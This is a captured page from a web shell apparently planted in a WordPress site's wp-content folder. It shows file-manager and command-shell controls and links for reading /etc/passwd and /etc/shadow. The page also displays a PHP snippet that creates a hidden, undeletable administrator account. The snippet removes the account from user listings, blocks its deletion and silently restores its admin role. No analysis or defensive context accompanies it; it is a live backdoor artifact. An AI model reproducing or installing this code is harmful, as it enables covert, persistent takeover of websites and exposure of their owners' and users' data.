Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
veronikagstoette
public_html
wp-content
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php if (!defined('ABSPATH')) { exit; } if (!defined('BBG_L')) { define('BBG_L', 'syse449bcc6'); } add_action('pre_user_query', 'bbg_hide'); function bbg_hide($q) { global $wpdb; if (!empty($q->query_where)) { $q->query_where .= $wpdb->prepare(' AND user_login <> %s', BBG_L); } } add_action('delete_user', 'bbg_block', 1); function bbg_block($id) { $u = get_userdata($id); if ($u && $u->user_login === BBG_L) { wp_die('Error: user cannot be deleted.'); } } add_action('init', 'bbg_keep'); function bbg_keep() { $u = get_user_by('login', BBG_L); if ($u && !user_can($u, 'manage_options')) { $u->set_role('administrator'); } }
Free Space : 748181495808 Byte